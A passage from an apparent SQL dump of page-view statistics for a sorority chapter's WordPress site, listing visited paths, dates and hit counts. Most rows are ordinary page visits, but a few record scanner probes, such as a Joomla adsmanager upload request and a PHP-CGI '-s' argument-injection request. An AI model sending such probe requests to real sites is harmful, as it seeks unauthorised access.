17-08-24',47,6),('/cause/marchofdimes-2/','2017-08-24',24,90),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-08-24',1,657),('/login-2/','2017-08-24',1,657),('/history/','2017-08-24',1,190),('/programs/','2017-08-24',3,247),('/scholarship','2017-08-24',1,797),('/scholarship/','2017-08-24',1,797),('/?pwidget=3371&action=1','2017-08-24',1,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-24',2,956),('/youth','2017-08-24',1,738),('/youth/','2017-08-24',2,738),('/','2017-08-25',66,6),('/history/','2017-08-25',2,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-25',1,956),('/instagram-show-private-person-declines/','2017-08-25',2,1096),('/programs/','2017-08-25',2,247),('/scholarship/','2017-08-25',1,797),('/login','2017-08-25',1,549),('/sorors/','2017-08-25',1,1093),('/ts_teams/shanee-satchell/','2017-08-25',1,820),('/ts_teams/tamara-curtis/','2017-08-25',1,821),('/ts_teams/constance-kinder/','2017-08-25',1,822),('/ts_teams/lillet-williams/','2017-08-25',1,823),('/ts_teams/lillet-williams-2/','2017-08-25',1,824),('/ts_teams/cherice-daniel-2/','2017-08-25',1,825),('/ts_teams/jeaneathia-yerby-crowder/','2017-08-25',1,828),('/ts_teams/kathy-ball/','2017-08-25',1,887),('/cause/marchofdimes-2/','2017-08-25',27,90),('/ts_teams/gloria-sanders/','2017-08-25',1,865),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Findex.php&reauth=1','2017-08-25',1,657),('/ts_teams/helen-newman/','2017-08-25',1,868),('/','2017-08-26',76,6),('/cause/marchofdimes-2/','2017-08-26',23,90),('/login','2017-08-26',1,549),('/sorors/','2017-08-26',1,1093),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-08-26',2,657),('/login-2/','2017-08-26',3,657),('/login-2/?loggedout=true','2017-08-26',1,657),('/scholarship-testing/','2017-08-26',1,1107),('/programs/','2017-08-26',2,247),('/scholarship/','2017-08-26',9,797),('/history/','2017-08-26',2,190),('/event/new-membership-informational/','2017-08-26',2,1115),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-26',1,956),('/scholarship','2017-08-26',1,797),('/','2017-08-27',64,6),('/cause/marchofdimes-2/','2017-08-27',22,90),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-27',1,956),('/history/','2017-08-27',1,190),('/scholarship/','2017-08-27',2,797),('/event/new-membership-informational/','2017-08-27',1,1115),('/programs/','2017-08-27',1,247),('/login-2/','2017-08-27',1,657),('/instagram-show-private-person-declines/','2017-08-27',1,1096),('/','2017-08-28',78,6),('/history/','2017-08-28',1,190),('/programs/','2017-08-28',1,247),('/scholarship/','2017-08-28',3,797),('/event/new-membership-informational/','2017-08-28',1,1115),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-28',1,956),('/instagram-show-private-person-declines/','2017-08-28',1,1096),('/login-2/','2017-08-28',1,657),('/cause/march-of-dimes/','2017-08-28',1,1023),('/download/aarc/','2017-08-28',1,991),('/download/constitution-by-laws/','2017-08-28',1,989),('/ts_teams/jeaneathia-yerby-crowder/','2017-08-28',1,828),('/ts_teams/cherice-daniel-2/','2017-08-28',1,825),('/ts_teams/lillet-williams-2/','2017-08-28',1,824),('/ts_teams/lillet-williams/','2017-08-28',1,823),('/ts_teams/constance-kinder/','2017-08-28',1,822),('/ts_teams/tamara-curtis/','2017-08-28',1,821),('/login-2/?mode=list','2017-08-28',1,657),('/login-2/?mode=grid','2017-08-28',1,657),('/cause/marchofdimes-2/','2017-08-28',26,90),('/','2017-08-29',112,6),('/cause/marchofdimes-2/','2017-08-29',9,90),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-29',2,956),('/login-2/','2017-08-29',3,657),('/scholarship/','2017-08-29',1,797),('/history/','2017-08-29',1,190),('/programs/','2017-08-29',1,247),('/event/new-membership-informational/','2017-08-29',1,1115),('/download/constitution-by-laws/','2017-08-29',1,989),('/','2017-08-30',71,6),('/cause/marchofdimes-2/','2017-08-30',39,90),('/scholarship/','2017-08-30',2,797),('/','2017-08-31',91,6),('/history/','2017-08-31',3,190),('/cause/marchofdimes-2/','2017-08-31',17,90),('/scholarship/','2017-08-31',3,797),('/programs/','2017-08-31',1,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-31',2,956),('/scholarship','2017-08-31',1,797),('/','2017-09-01',45,6),('/cause/marchofdimes-2/','2017-09-01',19,90),('/login-2/','2017-09-01',3,657),('/cause/marchofdimes-2/','2017-09-02',12,90),('/','2017-09-02',39,6),('/ts_teams/sandra-hudson/','2017-09-02',1,875),('/membership/','2017-09-02',1,576),('/ts_teams/kristin-clark/','2017-09-02',1,883),('/ts_teams/kalima-alawode/','2017-09-02',1,888),('/history/','2017-09-02',2,190),('/programs/','2017-09-02',2,247),('/scholarship/','2017-09-02',3,797),('/user/','2017-09-02',1,547),('/event/new-membership-informational/','2017-09-02',1,1115),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-02',1,956),('/login-2/','2017-09-02',1,657),('/','2017-09-03',50,6),('/cause/marchofdimes-2/','2017-09-03',22,90),('/history/','2017-09-03',2,190),('/programs/','2017-09-03',1,247),('/membership/','2017-09-03',1,576),('/','2017-09-04',70,6),('/cause/marchofdimes-2/','2017-09-04',15,90),('/scholarship','2017-09-04',1,797),('/event/new-membership-informational','2017-09-04',1,1115),('/programs','2017-09-04',1,247),('/scholarship/','2017-09-04',1,797),('/login-2/','2017-09-04',1,657),('/event/new-membership-informational/','2017-09-04',1,1115),('/programs/','2017-09-04',2,247),('/membership/','2017-09-04',1,576),('/','2017-09-05',99,6),('/cause/marchofdimes-2/','2017-09-05',24,90),('/ts_teams/celia-worrell/','2017-09-05',1,860),('/zen/','2017-09-05',1,786),('/scholarship/','2017-09-05',2,797),('/ts_teams/rose-matthews/','2017-09-05',1,870),('/cause/marchofdimes-2/','2017-09-06',19,90),('/','2017-09-06',89,6),('/ts_teams/cassandra-dorsey/','2017-09-06',1,880),('/ts_teams/cherice-daniel-2/','2017-09-06',1,825),('/ts_teams/shanee-satchell/','2017-09-06',1,820),('/membership/?//connect.facebook.net/en_US/sdk.js','2017-09-06',1,576),('/membership','2017-09-06',2,576),('/membership/','2017-09-06',2,576),('/ts_teams/sandra-hudson/','2017-09-06',1,875),('/scholarship/','2017-09-06',4,797),('/ts_teams/helen-newman/','2017-09-06',1,868),('/scholarship/application/','2017-09-06',1,804),('/ts_teams/patreece-carter/?//connect.facebook.net/en_US/sdk.js','2017-09-06',1,885),('/ts_teams/jeaneathia-yerby-crowder/','2017-09-06',1,828),('/history/','2017-09-06',4,190),('/ts_teams/kristin-clark/','2017-09-06',1,883),('/ts_teams/lillet-williams-2/','2017-09-06',1,824),('/ts_teams/constance-kinder/','2017-09-06',1,822),('/ts_teams/rose-matthews/','2017-09-06',1,870),('/ts_teams/tamika-r-daniels/','2017-09-06',1,814),('/ts_teams/kathy-ball/','2017-09-06',1,887),('/appa/','2017-09-06',3,781),('/ts_teams/jontue-sumler/','2017-09-06',1,862),('/ts_teams/michele-franklin/','2017-09-06',1,877),('/ts_teams/angela-jefferson/','2017-09-06',1,874),('/ts_teams/w-ruth-conway/','2017-09-06',1,881),('/ts_teams/linda-brigmon/?//connect.facebook.net/en_US/sdk.js','2017-09-06',1,886),('/ts_teams/rosee-ragin/','2017-09-06',1,866),('/ts_teams/linda-brigmon/','2017-09-06',1,886),('/ts_teams/ebony-cogdell/','2017-09-06',1,882),('/bog/','2017-09-06',3,772),('/ts_teams/w-ruth-conway/?//connect.facebook.net/en_US/sdk.js','2017-09-06',1,881),('/ts_teams/tamara-curtis/','2017-09-06',1,821),('/ts_teams/kathy-j-barrett/','2017-09-06',1,819),('/ts_teams/celia-worrell/','2017-09-06',1,860),('/ts_teams/christy-lewis/','2017-09-06',1,818),('/ts_teams/ava-lawson/','2017-09-06',1,872),('/ts_teams/crystal-whitaker/','2017-09-06',1,816),('/login-2/','2017-09-06',4,657),('/ts_teams/linda-price/','2017-09-06',1,867),('/history','2017-09-06',2,190),('/ts_teams/kristin-clark/?//connect.facebook.net/en_US/sdk.js','2017-09-06',1,883),('/ts_teams/tracy-irvin/','2017-09-06',1,815),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-06',2,956),('/ts_teams/kalima-alawode/','2017-09-06',1,888),('/scholarship/application/?//connect.facebook.net/en_US/sdk.js','2017-09-06',1,804),('/ts_teams/patreece-carter/','2017-09-06',1,885),('/event/new-membership-informational/','2017-09-06',3,1115),('/ts_teams/dawn-j-kemp/','2017-09-06',1,817),('/scholarship','2017-09-06',2,797),('/membership/?//connect_facebook_net/en_US/sdk_js','2017-09-06',1,576),('/ts_slider/567/','2017-09-06',1,567),('/ts_teams/maya-franklin/','2017-09-06',1,878),('/ts_teams/gloria-sanders/','2017-09-06',1,865),('/ts_teams/quiyatta-gardner/','2017-09-06',1,876),('/programs/','2017-09-06',2,247),('/ts_teams/crystal-whitaker/?//connect.facebook.net/en_US/sdk.js','2017-09-06',1,816),('/appa','2017-09-06',2,781),('/ts_teams/nathalia-drew/','2017-09-06',1,1084),('/cause/march-of-dimes/','2017-09-06',1,1023),('/cause/scholarship/','2017-09-06',1,59),('/bog','2017-09-06',2,772),('/download/aarc/','2017-09-06',1,991),('/instagram-show-private-person-declines/','2017-09-06',1,1096),('/zen','2017-09-06',2,786),('/zen/','2017-09-06',2,786),('/youth','2017-09-06',2,738),('/youth/','2017-09-06',2,738),('/ts_teams/lillet-williams/','2017-09-06',1,823),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-09-06',1,689),('/','2017-09-07',44,6),('/cause/marchofdimes-2/','2017-09-07',30,90),('/scholarship/','2017-09-07',2,797),('/programs/','2017-09-07',1,247),('/history/','2017-09-07',2,190),('/login-2/','2017-09-07',1,657),('/youth','2017-09-07',1,738),('/youth/','2017-09-07',2,738),('/bog','2017-09-07',1,772),('/bog/','2017-09-07',1,772),('/zen','2017-09-07',1,786),('/zen/','2017-09-07',1,786),('/scholarship','2017-09-07',1,797),('/instagram-show-private-person-declines/','2017-09-07',2,1096),('/appa','2017-09-07',1,781),('/appa/','2017-09-07',1,781),('/event/new-membership-informational/','2017-09-07',1,1115),('/','2017-09-08',52,6),('/cause/marchofdimes-2/','2017-09-08',15,90),('/scholarship/','2017-09-08',1,797),('/history/','2017-09-08',1,190),('/?=Submit&email=1&form_id=1&fs_postonce_1=b0d5fd4b89bce9c2f26628fa65b82d79,1504897586&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-09-08',1,6),('/?email=1&form_id=1&fs_postonce_1=b0d5fd4b89bce9c2f26628fa65b82d79%2C1504897586&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-09-08',1,6),('/','2017-09-09',51,6),('/cause/marchofdimes-2/','2017-09-09',19,90),('/youth/','2017-09-09',1,738),('/appa','2017-09-09',1,781),('/history/','2017-09-09',4,190),('/scholarship/','2017-09-09',7,797),('/service/breakfastonthego/','2017-09-09',4,772),('/service/appa/','2017-09-09',4,781),('/service/zen/','2017-09-09',4,786),('/service/','2017-09-09',3,247),('/service/youth/','2017-09-09',3,738),('/event/aacr-education-forum/','2017-09-09',2,1124),('/event/national-voter-registration-day/','2017-09-09',2,1129),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-09',2,956),('/login-2/','2017-09-09',1,657),('/','2017-09-10',62,6),('/service/','2017-09-10',1,247),('/history/','2017-09-10',2,190),('/scholarship/','2017-09-10',2,797),('/service/appa/','2017-09-10',1,781),('/service/breakfastonthego/','2017-09-10',1,772),('/service/youth/','2017-09-10',1,738),('/service/zen/','2017-09-10',1,786),('/event/aacr-education-forum/','2017-09-10',2,1124),('/event/national-voter-registration-day/','2017-09-10',2,1129),('/user/','2017-09-10',1,547),('/login-2/','2017-09-10',5,657),('/cause/marchofdimes-2/','2017-09-10',19,90),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-10',2,956),('/','2017-09-11',77,6),('/cause/marchofdimes-2/','2017-09-11',22,90),('/history/','2017-09-11',5,190),('/scholarship/','2017-09-11',9,797),('/service/','2017-09-11',7,247),('/service/appa/','2017-09-11',8,781),('/service/breakfastonthego/','2017-09-11',6,772),('/service/youth/','2017-09-11',7,738),('/service/zen/','2017-09-11',4,786),('/event/aacr-education-forum/','2017-09-11',10,1124),('/event/national-voter-registration-day/','2017-09-11',3,1129),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-11',2,956),('/instagram-show-private-person-declines/','2017-09-11',1,1096),('/login-2/','2017-09-11',1,657),('/cause/march-of-dimes/','2017-09-11',1,1023),('/download/aarc/','2017-09-11',1,991),('/download/constitution-by-laws/','2017-09-11',5,989),('/ts_teams/jeaneathia-yerby-crowder/','2017-09-11',1,828),('/ts_teams/cherice-daniel-2/','2017-09-11',2,825),('/ts_teams/lillet-williams-2/','2017-09-11',1,824),('/ts_teams/lillet-williams/','2017-09-11',1,823),('/ts_teams/constance-kinder/','2017-09-11',1,822),('/login-2/?mode=list','2017-09-11',1,657),('/login-2/?mode=grid','2017-09-11',1,657),('/scholarship/application/','2017-09-11',1,804),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-09-11',1,689),('/ts_teams/rose-matthews/','2017-09-11',1,870),('/','2017-09-12',90,6),('/history/','2017-09-12',2,190),('/scholarship/','2017-09-12',1,797),('/service/','2017-09-12',1,247),('/service/appa/','2017-09-12',1,781),('/service/breakfastonthego/','2017-09-12',1,772),('/service/youth/','2017-09-12',1,738),('/service/zen/','2017-09-12',1,786),('/event/aacr-education-forum/','2017-09-12',1,1124),('/event/national-voter-registration-day/','2017-09-12',1,1129),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-12',1,956),('/login-2/','2017-09-12',2,657),('/instagram-show-private-person-declines/','2017-09-12',1,1096),('/login-2/?mode=list','2017-09-12',1,657),('/login-2/?mode=grid','2017-09-12',1,657),('/cause/marchofdimes-2/','2017-09-12',27,90),('/download/constitution-by-laws/','2017-09-12',2,989),('/ts_teams/kathy-j-barrett/','2017-09-12',1,819),('/','2017-09-13',89,6),('/cause/marchofdimes-2/','2017-09-13',13,90),('/history/','2017-09-13',7,190),('/scholarship/','2017-09-13',6,797),('/service/','2017-09-13',5,247),('/service/appa/','2017-09-13',8,781),('/service/youth/','2017-09-13',7,738),('/service/breakfastonthego/','2017-09-13',7,772),('/event/aacr-education-forum/','2017-09-13',3,1124),('/event/national-voter-registration-day/','2017-09-13',3,1129),('/service/zen/','2017-09-13',6,786),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-13',3,956),('/login-2/','2017-09-13',3,657),('/ts_teams/crystal-whitaker/','2017-09-13',1,816),('/cause/marchofdimes-2/','2017-09-14',24,90),('/','2017-09-14',95,6),('/history/','2017-09-14',2,190),('/service/youth/','2017-09-14',2,738),('/service/','2017-09-14',2,247),('/event/aacr-education-forum/','2017-09-14',1,1124),('/service/breakfastonthego/','2017-09-14',1,772),('/event/amicette-informational/','2017-09-14',1,596),('/event/national-voter-registration-day/','2017-09-14',1,1129),('/service/appa/','2017-09-14',2,781),('/scholarship/','2017-09-14',4,797),('/service/zen/','2017-09-14',2,786),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-14',1,956),('/login-2/','2017-09-14',2,657),('/','2017-09-15',52,6),('/cause/marchofdimes-2/','2017-09-15',18,90),('/event/aacr-education-forum/','2017-09-15',1,1124),('/event/amicette-informational/','2017-09-15',1,596),('/?do=register','2017-09-15',1,6),('/service/appa/','2017-09-15',1,781),('/service/zen/','2017-09-15',2,786),('/scholarship/','2017-09-15',1,797),('/ts_teams/dawn-j-kemp/','2017-09-15',2,817),('/history/','2017-09-15',3,190),('/service/youth/','2017-09-15',1,738),('/','2017-09-16',67,6),('/cause/marchofdimes-2/','2017-09-16',24,90),('/event/aacr-education-forum/','2017-09-16',2,1124),('/service/breakfastonthego/','2017-09-16',4,772),('/scholarship/','2017-09-16',4,797),('/service/','2017-09-16',3,247),('/service/appa/','2017-09-16',5,781),('/service/zen/','2017-09-16',7,786),('/service/youth/','2017-09-16',3,738),('/history/','2017-09-16',2,190),('/ts_teams/tamara-curtis/','2017-09-16',1,821),('/ts_teams/shanee-satchell/','2017-09-16',1,820),('/ts_teams/kathy-j-barrett/','2017-09-16',1,819),('/ts_teams/christy-lewis/','2017-09-16',1,818),('/ts_teams/dawn-j-kemp/','2017-09-16',1,817),('/ts_teams/crystal-whitaker/','2017-09-16',1,816),('/ts_teams/tracy-irvin/','2017-09-16',1,815),('/ts_teams/tamika-r-daniels/','2017-09-16',1,814),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-09-16',1,689),('/event/amicette-informational/','2017-09-16',1,596),('/event/national-voter-registration-day/','2017-09-16',1,1129),('/event/adopt-a-highway/','2017-09-16',1,1165),('/event/breakfast-on-the-go/','2017-09-16',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-16',1,956),('/','2017-09-17',32,6),('/cause/marchofdimes-2/','2017-09-17',21,90),('/service/youth/','2017-09-17',2,738),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-09-17',2,689),('/cause/marchofdimes-2/','2017-09-18',16,90),('/','2017-09-18',66,6),('/scholarship/','2017-09-18',3,797),('/service/','2017-09-18',1,247),('/service/appa/','2017-09-18',1,781),('/service/breakfastonthego/','2017-09-18',1,772),('/service/youth/','2017-09-18',2,738),('/service/zen/','2017-09-18',1,786),('/event/adopt-a-highway/','2017-09-18',1,1165),('/','2017-09-19',71,6),('/cause/marchofdimes-2/','2017-09-19',25,90),('/user/','2017-09-19',1,547),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-19',1,956),('/service/','2017-09-19',3,247),('/service/breakfastonthego/','2017-09-19',1,772),('/service/zen/','2017-09-19',1,786),('/service/youth/','2017-09-19',1,738),('/service/appa/','2017-09-19',1,781),('/event/adopt-a-highway/','2017-09-19',1,1165),('/event/breakfast-on-the-go/','2017-09-19',1,493),('/','2017-09-20',91,6),('/event/aacr-education-forum/','2017-09-20',2,1124),('/index.php','2017-09-20',1,6),('/cause/marchofdimes-2/','2017-09-20',15,90),('/service/appa/','2017-09-20',1,781),('/scholarship/','2017-09-20',4,797),('/service/zen/','2017-09-20',1,786),('/history/','2017-09-20',2,190),('/cause/marchofdimes-2/','2017-09-21',17,90),('/','2017-09-21',63,6),('/scholarship','2017-09-21',1,797),('/scholarship/','2017-09-21',2,797),('/index.php?abc11=123','2017-09-21',1,6),('/history/','2017-09-21',1,190),('/ts_teams/celia-worrell/','2017-09-21',1,860),('/','2017-09-22',42,6),('/cause/marchofdimes-2/','2017-09-22',24,90),('/scholarship/','2017-09-22',1,797),('/event/aacr-education-forum/','2017-09-22',10,1124),('/index.php','2017-09-22',1,6),('/user/','2017-09-22',1,547),('//','2017-09-22',1,6),('/event/national-voter-registration-day/','2017-09-22',3,1129),('/?=Submit&email=1&form_id=1&fs_postonce_1=72a4fc4ce50ac5544e526665c1c64dd7,1506107385&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-09-22',1,6),('/?email=1&form_id=1&fs_postonce_1=72a4fc4ce50ac5544e526665c1c64dd7%2C1506107385&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-09-22',1,6),('/service/','2017-09-22',1,247),('/history/','2017-09-22',1,190),('/event/adopt-a-highway/','2017-09-22',1,1165),('/event/breakfast-on-the-go/','2017-09-22',1,493),('/service/appa/','2017-09-22',1,781),('/','2017-09-23',25,6),('/cause/marchofdimes-2/','2017-09-23',18,90),('/?pwidget=3371&action=1','2017-09-23',1,6),('/service/youth/','2017-09-23',3,738),('/service/','2017-09-23',3,247),('/service/breakfastonthego/','2017-09-23',4,772),('/scholarship/application/','2017-09-23',2,804),('/service/appa/','2017-09-23',3,781),('/scholarship/recommendation/','2017-09-23',2,1170),('/event/national-voter-registration-day/','2017-09-23',3,1129),('/service/zen/','2017-09-23',3,786),('/event/amicette-informational/','2017-09-23',2,596),('/scholarship/','2017-09-23',4,797),('/history/','2017-09-23',3,190),('/event/breakfast-on-the-go/','2017-09-23',2,493),('/event/adopt-a-highway/','2017-09-23',3,1165),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-23',3,956),('/scholarship/lgzscholarshipreleaseform/','2017-09-23',2,1173),('/?p=956','2017-09-23',1,956),('/ts_teams/lillet-williams/','2017-09-23',2,823),('/ts_teams/jeaneathia-yerby-crowder/','2017-09-23',2,828),('/ts_teams/cherice-daniel-2/','2017-09-23',2,825),('/cause/march-of-dimes/','2017-09-23',2,1023),('/ts_teams/lillet-williams-2/','2017-09-23',2,824),('/ts_teams/kathy-j-barrett/','2017-09-23',2,819),('/ts_teams/shanee-satchell/','2017-09-23',2,820),('/cause/scholarship/','2017-09-23',2,59),('/ts_teams/christy-lewis/','2017-09-23',2,818),('/ts_slider/567/','2017-09-23',2,567),('/ts_teams/constance-kinder/','2017-09-23',2,822),('/ts_teams/tracy-irvin/','2017-09-23',2,815),('/ts_teams/kathy-ball/','2017-09-23',2,887),('/ts_teams/dawn-j-kemp/','2017-09-23',1,817),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-09-23',2,689),('/ts_teams/nathalia-drew/','2017-09-23',2,1084),('/ts_teams/crystal-whitaker/','2017-09-23',2,816),('/ts_teams/tamara-curtis/','2017-09-23',2,821),('/ts_teams/kalima-alawode/','2017-09-23',2,888),('/ts_teams/tamika-r-daniels/','2017-09-23',2,814),('/ts_teams/linda-brigmon/','2017-09-23',2,886),('/ts_teams/helen-newman/','2017-09-23',1,868),('/','2017-09-24',33,6),('/cause/marchofdimes-2/','2017-09-24',17,90),('/event/amicette-informational/','2017-09-24',2,596),('/event/aacr-education-forum/','2017-09-24',1,1124),('/','2017-09-25',56,6),('/history/','2017-09-25',1,190),('/scholarship/','2017-09-25',1,797),('/scholarship/application/','2017-09-25',1,804),('/scholarship/recommendation/','2017-09-25',2,1170),('/service/','2017-09-25',1,247),('/service/appa/','2017-09-25',2,781),('/service/breakfastonthego/','2017-09-25',1,772),('/service/youth/','2017-09-25',2,738),('/service/zen/','2017-09-25',1,786),('/event/aacr-education-forum/','2017-09-25',6,1124),('/event/national-voter-registration-day/','2017-09-25',1,1129),('/event/adopt-a-highway/','2017-09-25',2,1165),('/event/breakfast-on-the-go/','2017-09-25',2,493),('/lgz-celebrates-35-years-service-howard-county-md/','2017-09-25',1,956),('/scholarship/lgzscholarshipreleaseform/','2017-09-25',1,1173),('/cause/march-of-dimes/','2017-09-25',1,1023),('/download/aarc/','2017-09-25',1,991),('/download/constitution-by-laws/','2017-09-25',1,989),('/ts_teams/jeaneathia-yerby-crowder/','2017-09-25',1,828),('/ts_teams/cherice-daniel-2/','2017-09-25',1,825),('/ts_teams/lillet-williams-2/','2017-09-25',1,824),('/ts_teams/lillet-williams/','2017-09-25',1,823),('/cause/marchofdimes-2/','2017-09-25',25,90),('/scholarship/recommendation','2017-09-25',1,1170),('/event/aacr-education-forum','2017-09-25',1,1124),('/service/appa','2017-09-25',1,781),('/event/breakfast-on-the-go','2017-09-25',1,493),('/','2017-09-26',204,6),('/download/constitution-by-laws/','2017-09-26',1,989),('/cause/marchofdimes-2/','2017-09-26',8,90),('/index.php','2017-09-26',1,6),('/history/','2017-09-26',8,190),('/service/','2017-09-26',2,247),('/scholarship/recommendation/','2017-09-26',4,1170),('/scholarship/','2017-09-26',4,797),('/scholarship/application/','2017-09-26',2,804),('/service/appa/','2017-09-26',1,781),('/service/breakfastonthego/','2017-09-26',1,772),('/service/youth/','2017-09-26',1,738),('/service/zen/','2017-09-26',1,786),('/event/aacr-education-forum/','2017-09-26',1,1124),('/wp-register.php','2017-09-26',1,6),('/','2017-09-27',120,6),('/cause/marchofdimes-2/','2017-09-27',30,90),('/history/','2017-09-27',1,190),('/index.php','2017-09-27',1,6),('/service/appa/','2017-09-27',1,781),('/scholarship/','2017-09-27',1,797),('/','2017-09-28',109,6),('/cause/marchofdimes-2/','2017-09-28',15,90),('/index.php?option=com_adsmanager&task=upload&tmpl=component','2017-09-28',1,6),('/download/aarc/','2017-09-28',1,991),('/','2017-09-29',110,6),('/cause/marchofdimes-2/','2017-09-29',18,90),('/service/breakfastonthego','2017-09-29',1,772),('/service/breakfastonthego/','2017-09-29',1,772),('/scholarship/recommendation','2017-09-29',1,1170),('/scholarship/recommendation/','2017-09-29',1,1170),('/event/breakfast-on-the-go','2017-09-29',1,493),('/event/breakfast-on-the-go/','2017-09-29',1,493),('/event/adopt-a-highway','2017-09-29',1,1165),('/event/adopt-a-highway/','2017-09-29',3,1165),('/service/appa','2017-09-29',1,781),('/service/appa/','2017-09-29',1,781),('/scholarship/','2017-09-29',3,797),('/history/','2017-09-29',3,190),('/','2017-09-30',87,6),('/cause/marchofdimes-2/','2017-09-30',13,90),('/service/breakfastonthego','2017-09-30',1,772),('/service/breakfastonthego/','2017-09-30',2,772),('/event/adopt-a-highway/','2017-09-30',3,1165),('/history/','2017-09-30',2,190),('/service/appa/','2017-09-30',1,781),('/service/youth/','2017-09-30',1,738),('/service/zen/','2017-09-30',11,786),('/service/','2017-09-30',1,247),('/event/breakfast-on-the-go/','2017-09-30',1,493),('/scholarship/','2017-09-30',1,797),('/scholarship/soror-conway1/','2017-09-30',1,1179),('/membership/','2017-09-30',1,576),('/service/zen/','2017-10-01',23,786),('/','2017-10-01',87,6),('/ts_teams/kristin-clark/','2017-10-01',1,883),('/download/constitution-by-laws/','2017-10-01',3,989),('/scholarship/application/','2017-10-01',1,804),('/event/adopt-a-highway/','2017-10-01',2,1165),('/?pwidget=3371&action=1','2017-10-01',1,6),('/','2017-10-02',157,6),('/service/zen/','2017-10-02',23,786),('/event/breakfast-on-the-go/','2017-10-02',1,493),('/history/','2017-10-02',3,190),('/scholarship/','2017-10-02',4,797),('/service/appa/','2017-10-02',3,781),('/service/breakfastonthego/','2017-10-02',1,772),('/service/youth/','2017-10-02',1,738),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-02',1,956),('/login-2/','2017-10-02',1,657),('/lostpassword/','2017-10-02',1,660),('/index.php','2017-10-02',2,6),('/scholarship/application/','2017-10-02',4,804),('/scholarship/recommendation/','2017-10-02',2,1170),('/ts_teams/rosee-ragin/','2017-10-02',1,866),('/','2017-10-03',84,6),('/service/zen/','2017-10-03',20,786),('/history/','2017-10-03',2,190),('/service/','2017-10-03',2,247),('/scholarship/application/','2017-10-03',2,804),('/service/youth/','2017-10-03',4,738),('/service/breakfastonthego/','2017-10-03',3,772),('/service/appa/','2017-10-03',4,781),('/scholarship/recommendation/','2017-10-03',2,1170),('/index.php?-s','2017-10-03',1,6),('/','2017-10-04',97,6),('/service/zen/','2017-10-04',27,786),('/scholarship','2017-10-04',1,797),('/scholarship/','2017-10-04',3,797),('/scholarship/application/','2017-10-04',5,804),('/scholarship/recommendation/','2017-10-04',2,1170),('/index.php','2017-10-04',1,6),('/history/','2017-10-04',3,190),('/service/','2017-10-04',3,247),('/service/appa/','2017-10-04',1,781),('/event/breakfast-on-the-go/','2017-10-04',1,493),('/service/breakfastonthego/','2017-10-04',1,772),('/event/making-strides-breast-cancer-walk/','2017-10-04',2,1185),('/service/youth/','2017-10-04',1,738),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-04',1,956),('/service/zen/','2017-10-05',17,786),('/','2017-10-05',103,6),('/ts_teams/tamara-curtis/','2017-10-05',4,821),('/ts_teams/cherice-daniel-2/','2017-10-05',3,825),('/ts_teams/lillet-williams/','2017-10-05',3,823),('/ts_teams/jeaneathia-yerby-crowder/','2017-10-05',3,828),('/ts_teams/lillet-williams-2/','2017-10-05',4,824),('/scholarship/soror-conway1/','2017-10-05',2,1179),('/ts_teams/constance-kinder/','2017-10-05',4,822),('/ts_teams/kathy-ball/','2017-10-05',3,887),('/ts_teams/nathalia-drew/','2017-10-05',3,1084),('/ts_teams/kalima-alawode/','2017-10-05',3,888),('/ts_teams/linda-brigmon/','2017-10-05',3,886),('/service/breakfastonthego/','2017-10-05',1,772),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-05',1,956),('/service/appa/','2017-10-05',2,781),('/scholarship/recommendation/','2017-10-05',4,1170),('/service/youth/','2017-10-05',1,738),('/event/breakfast-on-the-go/','2017-10-05',2,493),('/scholarship/lgzscholarshipreleaseform/','2017-10-05',1,1173),('/scholarship/application/','2017-10-05',1,804),('/history/','2017-10-05',5,190),('/','2017-10-06',88,6),('/index.php','2017-10-06',2,6),('/service/zen/','2017-10-06',16,786),('/history/','2017-10-06',2,190),('/ts_teams/ebony-cogdell/','2017-10-06',2,882),('/lgz-celebrates-35-years-service-howard-county-md/','2017-10-06',1,956),('/event/making-strides-breast-cancer-walk/','2017-10-06',4,1185),('/','2017-10-07',80,6),('/service/zen/','2017-10-07',16,786),('/service/youth/','2017-10-07',2,738),('/?=Submit&email=1&form_id=1&fs_postonce_1=76880f8a70cd07c4cc983a3a10436cb2,1507402901&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-10-07',1,6),('/?email=1&form_id=1&fs_postonce_1=76880f8a70cd07c4cc983a3a10436cb2%2C1507402901&fscf_submitted=1&full_name=1&mailto_id=1&message=1&si_contact_action=send','2017-10-07',1,6),('/event/breakfast-on-the-go/','2017-10-07',1,493),('/history/','2017-10-07',3,190),('/event/making-strides-breast-cancer-walk/','2017-10-07',1,1185),('/service/appa/','2017-10-07',1,781),('/scholarship/application/','2017-10-07',1,804),('/s